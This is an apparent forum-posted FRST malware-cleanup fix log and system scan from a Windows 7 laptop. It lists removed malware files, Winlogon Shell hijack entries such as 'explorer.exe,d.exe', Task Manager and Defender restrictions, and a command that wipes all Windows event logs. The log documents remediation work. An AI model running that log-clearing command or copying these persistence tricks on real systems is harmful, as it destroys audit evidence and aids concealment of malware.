[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,e.exe"
========= End of CMD: =========
 
VirusTotal: C:\Windows\e.exe => https://www.virustot...sis/1569748171/
VirusTotal: C:\Windows\d.exe => https://www.virustot...sis/1573881239/
VirusTotal: C:\Windows\fr.exe => https://www.virustot...sis/1571079306/
C:\Windows\e.bat => moved successfully
C:\Windows\e.exe => moved successfully
C:\Windows\fr.exe => moved successfully
C:\Windows\Wget => moved successfully
C:\Windows\curl => moved successfully
C:\Windows\d.exe => moved successfully
C:\Windows\d.bat => moved successfully
C:\Windows\y.txt => moved successfully
C:\Windows\mgr_n.reg => moved successfully
C:\Windows\mgr_f.reg => moved successfully
C:\Windows\e.reg => moved successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{62634D95-960B-4834-8E71-A70408AD8FD9} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{84EB3779-151B-4C71-AEF0-A0FEE9481401} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F} => removed successfully
HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\ANotepad++64 => removed successfully
HKLM\Software\Classes\CLSID\{B298D29A-A6ED-11DE-BA8C-A68E55D89593} => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\IObitUnstaler => removed successfully
HKLM\Software\Classes\CLSID\{836AB26C-2DE4-41D3-AC24-4C6C2699B960} => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\IObitUnstaler => removed successfully
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\IObitUnstaler => removed successfully
 
========= FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i" =========
 
 
========= End of CMD: =========
 
 
 
The system needed a reboot.
 
==== End of Fixlog 01:42:12 ====
 
 
Copy of FRST.txt:
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (19-11-2019 01:52:02)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Mixbyte Inc -> ) C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
(Opera Software AS -> Opera Software) C:\Program Files (x86)\Opera\64.0.3417.92\opera_autoupdate.exe
(Opera Software AS -> Opera Software) C:\Program Files (x86)\Opera\launcher.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(RealNetworks, Inc. -> RealNetworks, Inc.) C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
HKLM-x32\...\Run: [NBKeyScan] => "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {5131D822-F872-406C-8CEE-0DD5F2503DE1} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8C89DC2A-A626-4A37-9C20-27E3EAD3A4E5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {D781353E-F7F2-4393-9283-0F8A0A1C52E5} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {EF68E912-4810-45BB-A8DF-394E2CB49789} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
